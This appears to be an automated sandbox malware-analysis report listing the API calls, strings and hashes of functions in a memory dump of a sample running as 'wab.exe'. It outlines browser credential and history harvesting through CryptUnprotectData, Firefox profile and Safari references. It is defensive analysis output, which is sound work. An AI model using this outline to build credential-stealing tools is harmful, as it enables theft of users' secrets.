                                  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                  • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                  • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                • String ID:
                                • API String ID: 1203541146-0
                                • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                APIs
                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Version
                                • String ID:
                                • API String ID: 1889659487-0
                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                APIs
                                • _wcsicmp.MSVCRT ref: 004022A6
                                • _wcsicmp.MSVCRT ref: 004022D7
                                • _wcsicmp.MSVCRT ref: 00402305
                                • _wcsicmp.MSVCRT ref: 00402333
                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                • memset.MSVCRT ref: 0040265F
                                • memcpy.MSVCRT ref: 0040269B
                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                • memcpy.MSVCRT ref: 004026FF
                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                • API String ID: 2929817778-1134094380
                                • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                • String ID: :stringdata$ftp://$http://$https://
                                • API String ID: 2787044678-1921111777
                                • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                • GetWindowRect.USER32(?,?), ref: 00414088
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                • GetDC.USER32 ref: 004140E3
                                • wcslen.MSVCRT ref: 00414123
                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                • ReleaseDC.USER32(?,?), ref: 00414181
                                • _snwprintf.MSVCRT ref: 00414244
                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                • GetClientRect.USER32(?,?), ref: 004142E1
                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                • GetClientRect.USER32(?,?), ref: 0041433B
                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                • String ID: %s:$EDIT$STATIC
                                • API String ID: 2080319088-3046471546
                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                APIs
                                • EndDialog.USER32(?,?), ref: 00413221
                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                • memset.MSVCRT ref: 00413292
                                • memset.MSVCRT ref: 004132B4
                                • memset.MSVCRT ref: 004132CD
                                • memset.MSVCRT ref: 004132E1
                                • memset.MSVCRT ref: 004132FB
                                • memset.MSVCRT ref: 00413310
                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                • memset.MSVCRT ref: 004133C0
                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                • memcpy.MSVCRT ref: 004133FC
                                • wcscpy.MSVCRT ref: 0041341F
                                • _snwprintf.MSVCRT ref: 0041348E
                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                • SetFocus.USER32(00000000), ref: 004134B7
                                Strings
                                • {Unknown}, xrefs: 004132A6
                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                • API String ID: 4111938811-1819279800
                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                APIs
                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                • EndDialog.USER32(?,?), ref: 0040135E
                                • DeleteObject.GDI32(?), ref: 0040136A
                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                • ShowWindow.USER32(00000000), ref: 00401398
                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                • ShowWindow.USER32(00000000), ref: 004013A7
                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                • String ID:
                                • API String ID: 829165378-0
                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                APIs
                                • memset.MSVCRT ref: 00404172
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                • wcscpy.MSVCRT ref: 004041D6
                                • wcscpy.MSVCRT ref: 004041E7
                                • memset.MSVCRT ref: 00404200
                                • memset.MSVCRT ref: 00404215
                                • _snwprintf.MSVCRT ref: 0040422F
                                • wcscpy.MSVCRT ref: 00404242
                                • memset.MSVCRT ref: 0040426E
                                • memset.MSVCRT ref: 004042CD
                                • memset.MSVCRT ref: 004042E2
                                • _snwprintf.MSVCRT ref: 004042FE
                                • wcscpy.MSVCRT ref: 00404311
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                • API String ID: 2454223109-1580313836
                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                APIs
                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                • SetMenu.USER32(?,00000000), ref: 00411453
                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                • memcpy.MSVCRT ref: 004115C8
                                • ShowWindow.USER32(?,?), ref: 004115FE
                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                • API String ID: 4054529287-3175352466
                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                • API String ID: 3143752011-1996832678
                                • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                APIs
                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                • API String ID: 667068680-2887671607
                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                • API String ID: 1607361635-601624466
                                • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _snwprintf$memset$wcscpy
                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                • API String ID: 2000436516-3842416460
                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                APIs
                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                • String ID:
                                • API String ID: 1043902810-0
                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                APIs
                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                • memset.MSVCRT ref: 0040E380
                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                • wcschr.MSVCRT ref: 0040E3B8
                                • memcpy.MSVCRT ref: 0040E3EC
                                • memcpy.MSVCRT ref: 0040E407
                                • memcpy.MSVCRT ref: 0040E422
                                • memcpy.MSVCRT ref: 0040E43D
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                • API String ID: 3073804840-2252543386
                                • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@??3@_snwprintfwcscpy
                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                • API String ID: 2899246560-1542517562
                                • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                APIs
                                • memset.MSVCRT ref: 0040DBCD
                                • memset.MSVCRT ref: 0040DBE9
                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                • wcscpy.MSVCRT ref: 0040DC2D
                                • wcscpy.MSVCRT ref: 0040DC3C
                                • wcscpy.MSVCRT ref: 0040DC4C
                                • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                • wcscpy.MSVCRT ref: 0040DCC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                • API String ID: 3330709923-517860148
                                • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                APIs
